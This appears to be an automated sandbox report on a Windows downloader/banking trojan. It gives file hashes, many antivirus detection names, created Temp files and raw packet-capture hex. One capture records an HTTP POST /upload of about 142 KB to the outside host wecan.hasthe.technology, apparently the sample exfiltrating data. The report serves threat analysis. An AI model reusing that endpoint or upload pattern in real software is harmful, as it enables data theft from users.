Analysis Date | 2018-04-17 21:46:33 |
---|---|
MD5 | 5d92c65a7882b1a206a16b413b893a8a |
SHA1 | 680d5157871bd41bab6c490fa8fae2807823f1dd |
Static Details:
File type | PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows | |
---|---|---|
PEhash | ||
AV | Arcabit (arcavir) | Trojan.GenericKD.30606265 |
AV | Authentium | W32/S-f9d51e84!Eldorado |
AV | Grisoft (avg) | No Virus |
AV | Avira (antivir) | TR/Spy.Banker.axzdc |
AV | Alwil (avast) | Banker-LAA [Trj] |
AV | Ad-Aware | Trojan.GenericKD.30606265 |
AV | BitDefender | Trojan.GenericKD.30606265 |
AV | BullGuard | Trojan.GenericKD.30606265 |
AV | ClamAV | No Virus |
AV | Dr. Web | Tool.Snojan.1 |
AV | Emsisoft | Trojan.GenericKD.30606265 |
AV | MicroWorld (escan) | Application.Agent.BPO |
AV | CA (E-Trust Ino) | No Virus |
AV | Fortinet | Riskware/Snojan |
AV | Frisk (f-prot) | W32/S-f9d51e84!Eldorado |
AV | F-Secure | Trojan.GenericKD.30606265 |
AV | Ikarus | Downloader.Snojan |
AV | K7 | Trojan ( 0052706d1 ) |
AV | Kaspersky | Downloader.Win32.Snojan.eiqu |
AV | MalwareBytes | No Virus |
AV | Mcafee | GenericRXEO-OL!5D92C65A7882 |
AV | Microsoft Security Essentials | No Virus |
AV | NANO | Trojan.Win32.Snojan.evvppm |
AV | Eset (nod32) | No Virus |
AV | Padvish | No Virus |
AV | CAT (quickheal) | Trojan.Snojan.S1829144 |
AV | Rising | No Virus |
AV | 360 Safe | No Virus |
AV | SUPERAntiSpyware | No Virus |
AV | Symantec | SMG.Heur!gen |
AV | Trend Micro | No Virus |
AV | Twister | Generik.HWSOMXU.ceqp |
AV | VirusBlokAda (vba32) | Downloader.Snojan |
AV | Windows Defender | No Virus |
AV | Zillya! | Trojan.GenericKD.Win32.100891 |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\Windows\System32\lsass.exe
Process
↳ C:\Users\Phil\AppData\Local\Temp\680d5157871bd41bab6c490fa8fae2807823f1dd.exe
Creates File | C:\Users\Phil\AppData\Local\Temp\680d5157871bd41bab6c490fa8fae2807823f1dd.exe |
---|---|
Creates File | C:\Users\Phil\AppData\Local\Temp\rifaien2-jVmkPdw9e2j603t7.exe |
Creates File | C:\Users\Phil\AppData\Local\Temp\rifaien2-jVmkPdw9e2j603t7.exe |
Network Details:
Raw Pcap
0x00000000 (00000) 47455420 2f6e6373 692e7478 74204854 GET /ncsi.txt HT 0x00000010 (00016) 54502f31 2e310d0a 436f6e6e 65637469 TP/1.1..Connecti 0x00000020 (00032) 6f6e3a20 436c6f73 650d0a55 7365722d on: Close..User- 0x00000030 (00048) 4167656e 743a204d 6963726f 736f6674 Agent: Microsoft 0x00000040 (00064) 204e4353 490d0a48 6f73743a 20777777 NCSI..Host: www 0x00000050 (00080) 2e6d7366 746e6373 692e636f 6d0d0a0d .msftncsi.com... 0x00000060 (00096) 0a . 0x00000000 (00000) 47455420 2f6e6373 692e7478 74204854 GET /ncsi.txt HT 0x00000010 (00016) 54502f31 2e310d0a 436f6e6e 65637469 TP/1.1..Connecti 0x00000020 (00032) 6f6e3a20 436c6f73 650d0a55 7365722d on: Close..User- 0x00000030 (00048) 4167656e 743a204d 6963726f 736f6674 Agent: Microsoft 0x00000040 (00064) 204e4353 490d0a48 6f73743a 20777777 NCSI..Host: www 0x00000050 (00080) 2e6d7366 746e6373 692e636f 6d0d0a0d .msftncsi.com... 0x00000060 (00096) 0a . 0x00000000 (00000) 504f5354 202f7570 6c6f6164 20485454 POST /upload HTT 0x00000010 (00016) 502f312e 310d0a48 6f73743a 20776563 P/1.1..Host: wec 0x00000020 (00032) 616e2e68 61737468 652e7465 63686e6f an.hasthe.techno 0x00000030 (00048) 6c6f6779 0d0a4163 63657074 3a202a2f logy..Accept: */ 0x00000040 (00064) 2a0d0a43 6f6e7465 6e742d4c 656e6774 *..Content-Lengt 0x00000050 (00080) 683a2031 34323735 360d0a45 78706563 h: 142756..Expec 0x00000060 (00096) 743a2031 30302d63 6f6e7469 6e75650d t: 100-continue. 0x00000070 (00112) 0a436f6e 74656e74 2d547970 653a206d .Content-Type: m 0x00000080 (00128) 756c7469 70617274 2f666f72 6d2d6461 ultipart/form-da 0x00000090 (00144) 74613b20 626f756e 64617279 3d2d2d2d ta; boundary=--- 0x000000a0 (00160) 2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d ---------------- 0x000000b0 (00176) 2d2d2d2d 2d393132 61366532 35376131 -----912a6e257a1 0x000000c0 (00192) 35653065 350d0a0d 0a 5e0e5.... 0x00000000 (00000) 504f5354 202f3365 31363236 34372d63 POST /3e162647-c 0x00000010 (00016) 3364382d 34346333 2d393937 622d3061 3d8-44c3-997b-0a 0x00000020 (00032) 63396135 66363838 33322f20 48545450 c9a5f68832/ HTTP 0x00000030 (00048) 2f312e31 0d0a4361 6368652d 436f6e74 /1.1..Cache-Cont 0x00000040 (00064) 726f6c3a 206e6f2d 63616368 650d0a43 rol: no-cache..C 0x00000050 (00080) 6f6e6e65 6374696f 6e3a2043 6c6f7365 onnection: Close 0x00000060 (00096) 0d0a5072 61676d61 3a206e6f 2d636163 ..Pragma: no-cac 0x00000070 (00112) 68650d0a 436f6e74 656e742d 54797065 he..Content-Type 0x00000080 (00128) 3a206170 706c6963 6174696f 6e2f736f : application/so 0x00000090 (00144) 61702b78 6d6c0d0a 55736572 2d416765 ap+xml..User-Age 0x000000a0 (00160) 6e743a20 57534441 50490d0a 436f6e74 nt: WSDAPI..Cont 0x000000b0 (00176) 656e742d 4c656e67 74683a20 3733330d ent-Length: 733. 0x000000c0 (00192) 0a486f73 743a2031 39322e31 36382e31 .Host: 192.168.1 0x000000d0 (00208) 30302e31 34323a35 3335370d 0a0d0a3c 00.142:5357....< 0x000000e0 (00224) 3f786d6c 20766572 73696f6e 3d22312e ?xml version="1. 0x000000f0 (00240) 30222065 6e636f64 696e673d 22757466 0" encoding="utf 0x00000100 (00256) 2d38223f 3e3c736f 61703a45 6e76656c -8"?><soap:Envel 0x00000110 (00272) 6f706520 786d6c6e 733a736f 61703d22 ope xmlns:soap=" 0x00000120 (00288) 68747470 3a2f2f77 77772e77 332e6f72 http://www.w3.or 0x00000130 (00304) 672f3230 30332f30 352f736f 61702d65 g/2003/05/soap-e 0x00000140 (00320) 6e76656c 6f706522 20786d6c 6e733a77 nvelope" xmlns:w 0x00000150 (00336) 73613d22 68747470 3a2f2f73 6368656d sa="http://schem 0x00000160 (00352) 61732e78 6d6c736f 61702e6f 72672f77 as.xmlsoap.org/w 0x00000170 (00368) 732f3230 30342f30 382f6164 64726573 s/2004/08/addres 0x00000180 (00384) 73696e67 2220786d 6c6e733a 6c6d733d sing" xmlns:lms= 0x00000190 (00400) 22687474 703a2f2f 73636865 6d61732e "http://schemas. 0x000001a0 (00416) 6d696372 6f736f66 742e636f 6d2f7769 microsoft.com/wi 0x000001b0 (00432) 6e646f77 732f6c6d 732f3230 30372f30 ndows/lms/2007/0 0x000001c0 (00448) 38223e3c 736f6170 3a486561 6465723e 8"><soap:Header> 0x000001d0 (00464) 3c777361 3a546f3e 75726e3a 75756964 <wsa:To>urn:uuid 0x000001e0 (00480) 3a336531 36323634 372d6333 64382d34 :3e162647-c3d8-4 0x000001f0 (00496) 3463332d 39393762 2d306163 39613566 4c3-997b-0ac9a5f 0x00000200 (00512) 36383833 323c2f77 73613a54 6f3e3c77 68832</wsa:To><w 0x00000210 (00528) 73613a41 6374696f 6e3e6874 74703a2f sa:Action>http:/ 0x00000220 (00544) 2f736368 656d6173 2e786d6c 736f6170 /schemas.xmlsoap 0x00000230 (00560) 2e6f7267 2f77732f 32303034 2f30392f .org/ws/2004/09/ 0x00000240 (00576) 7472616e 73666572 2f476574 3c2f7773 transfer/Get</ws 0x00000250 (00592) 613a4163 74696f6e 3e3c7773 613a4d65 a:Action><wsa:Me 0x00000260 (00608) 73736167 6549443e 75726e3a 75756964 ssageID>urn:uuid 0x00000270 (00624) 3a666531 66363065 352d3733 30332d34 :fe1f60e5-7303-4 0x00000280 (00640) 3864622d 39333230 2d393031 38363964 8db-9320-901869d 0x00000290 (00656) 33643733 613c2f77 73613a4d 65737361 3d73a</wsa:Messa 0x000002a0 (00672) 67654944 3e3c7773 613a5265 706c7954 geID><wsa:ReplyT 0x000002b0 (00688) 6f3e3c77 73613a41 64647265 73733e68 o><wsa:Address>h 0x000002c0 (00704) 7474703a 2f2f7363 68656d61 732e786d ttp://schemas.xm 0x000002d0 (00720) 6c736f61 702e6f72 672f7773 2f323030 lsoap.org/ws/200 0x000002e0 (00736) 342f3038 2f616464 72657373 696e672f 4/08/addressing/ 0x000002f0 (00752) 726f6c65 2f616e6f 6e796d6f 75733c2f role/anonymous</ 0x00000300 (00768) 7773613a 41646472 6573733e 3c2f7773 wsa:Address></ws 0x00000310 (00784) 613a5265 706c7954 6f3e3c77 73613a46 a:ReplyTo><wsa:F 0x00000320 (00800) 726f6d3e 3c777361 3a416464 72657373 rom><wsa:Address 0x00000330 (00816) 3e75726e 3a757569 643a6462 32313261 >urn:uuid:db212a 0x00000340 (00832) 37332d38 6561632d 34636462 2d613962 73-8eac-4cdb-a9b 0x00000350 (00848) 352d6237 66323833 63633438 30613c2f 5-b7f283cc480a</ 0x00000360 (00864) 7773613a 41646472 6573733e 3c2f7773 wsa:Address></ws 0x00000370 (00880) 613a4672 6f6d3e3c 6c6d733a 4c617267 a:From><lms:Larg 0x00000380 (00896) 654d6574 61646174 61537570 706f7274 eMetadataSupport 0x00000390 (00912) 2f3e3c2f 736f6170 3a486561 6465723e /></soap:Header> 0x000003a0 (00928) 3c736f61 703a426f 64792f3e 3c2f736f <soap:Body/></so 0x000003b0 (00944) 61703a45 6e76656c 6f70653e ap:Envelope>
Strings